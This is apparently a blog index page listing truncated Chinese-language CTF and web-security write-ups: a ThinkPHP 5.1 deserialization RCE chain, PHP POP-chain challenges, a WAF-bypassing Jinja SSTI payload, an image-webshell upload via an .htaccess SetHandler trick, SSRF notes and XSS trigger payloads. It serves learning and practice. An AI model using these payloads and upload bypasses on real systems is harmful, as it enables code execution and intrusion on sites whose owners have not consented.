Dyinglight's blog

一、ThinkPHP5.1.x反序列化链 1234Window对象__destruct ->removefiles()的file_exists(Pivot对象)->conversion对象的__tostring->toJson()->toArray()->[$relation->visible($name)#传入request对象调用__call方法]->call_user_func_array控制hook变量去访问isAjax函数->param函数->input函数(参数可控)->filtervalue函数->call_user_func完全可控RCE poc: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748<?phpnamespace think;abstract class Model{ protected $append = []; private $dat ...

SCTF-web扫目录得到robots.txt 12345678910111213User-agent: *Disallow: /issues/ganttDisallow: /issues/calendarDisallow: /activityDisallow: /searchDisallow: /issues?sort=Disallow: /issues?query_id=Disallow: /issues?*set_filter=Disallow: /issues/*.pdf$Disallow: /projects/*.pdf$Disallow: /loginDisallow: /account/registerDisallow: /account/lost_password admin admin123456

2024长城杯-wp WEBsqlup先fuzz一波 过滤了–+,#,select,and ,or 输入admin 1进去了？？？（源代码的fuzzy matching实际上是用%%密码登录 点击头像有文件上传的点 过滤了字母p，导致无法上传.php文件，尝试了一下可以上传正常的gif文件 所以可以做一个gif的图片马 上传之后我们打开图片链接，就可以拿到图片的目录了 http://eci-2ze5wzpsckex64sy7i6f.cloudeci1.ichunqiu.com/uploads/2.gif 有了图片马该如何利用呢？想到了.htaccess文件可以更改文件的解析 我们上传一个.htaccess文件：SetHandler application/x-httpd-php 这样所有的文件都会当做php代码来解析 (蚁剑无法打开/flag文件，需要用tac指令显示！) candyshop[未解出]{‘csrf_token’: ‘04d9a3ecee8267e5ce21f9377e99fd425144aa5f’, ‘identity’: ‘guest’, ‘ ...

BaseCTF-web[Week2] ez_ser源代码+poc 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263<?phphighlight_file(__FILE__);error_reporting(0);class re{ public $chu0; public function __toString(){ if(!isset($this->chu0)){ return "I can not believes!"; } $this->chu0->$nononono;#3 chu0=new pwn() }}class web {#5 public $kw; public $dt; pu ...

ssti刷题1.dasctf8月 Truemanflask模版注入，4有注入点 过滤了. _ \ [ ] "和各种关键字 https://github.com/Marven11/Fenjing这个工具可以直接绕过waff 生成的payload为 1{%set hd='OS'|lower%}{%set rz=lipsum|escape|batch(22)|first|last%}{%set gl=rz*2~'g''lobals'~rz*2%}{%set ge=rz*2~'g''etitem'~rz*2%}{%set bu=rz*2~'builtins'~rz*2%}{%set im=rz*2~'import'~rz*2%}{{(((((cycler|attr('next')|attr ...

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick StartCreate a new post1$ hexo new "My New Post" More info: Writing Run server1$ hexo server More info: Server Generate static files1$ hexo generate More info: Generating Deploy to remote sites1$ hexo deploy More info: Deployment

SSRF漏洞一.前置知识NATSSRF:service side request forgery服务器请求伪造 NAT: Network Address Transition 网络地址转换 静态NAT地址转换：内网转化为公网ip NAT端口映射：通过防火墙NAT可以实现把私网ip端口映射到公网ip端口访问 curl函数三件套 curl_init:初始化一个Curl会话，里面一般是放URL地址，也可以放在curl_setopt里面的选项内 curl_setopt:设置curl会话的选项，比如CURLOPT_HEADER, 0表示将头文件的信息作为数据流输出 CURLOPT_RETURNTRANSFER，1将curl_exec()获取的信息以文件流的形式返回，而不是直接输出。 curl_exec:执行curl会话 curl_close:关闭curl会话 二.SSRF漏洞原理SSRF:service side request forgery服务器请求伪造 攻击目标是从外网无法访问的内部系统 形成原因：服务端提供了从服务器其他应用获取数据的功能 攻击方式： 三.伪协议信息搜集s ...

7.15刷题[MRCTF2020]Ezpop1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Crack It!class Modifier { protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append($this->var);#1 $var=p ...

7.13刷题[NewStarCTF 公开赛赛道]UnserializeOne12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758<?phperror_reporting(0);highlight_file(__FILE__);#Something useful for you : https://zhuanlan.zhihu.com/p/377676274class Start{ public $name; protected $func; public function __destruct()#12当一个对象被销毁时，__destruct() 方法会被调用 { echo "Welcome to NewStarCTF, ".$this->name;#11__toString() 方法会被自动调用 } public ...

XSS跨站脚本攻击漏洞一、常见触发标签无过滤情况1.<script><scirpt>alert("xss");</script> 2.<img>当图片加载错误时触发 <img src="x" onerror=alert(1)><img src="1" onerror=eval("alert('xss')")> 还可以改成onmouseover=”alert(1)” onmouseout=”alert(1)” 3.<a>123456<a href="https://www.qq.com">qq</a><a href=javascript:alert('xss')>test</a> 不是触发性的动作需要加前缀javascript:<a href="javascript:a" onm ...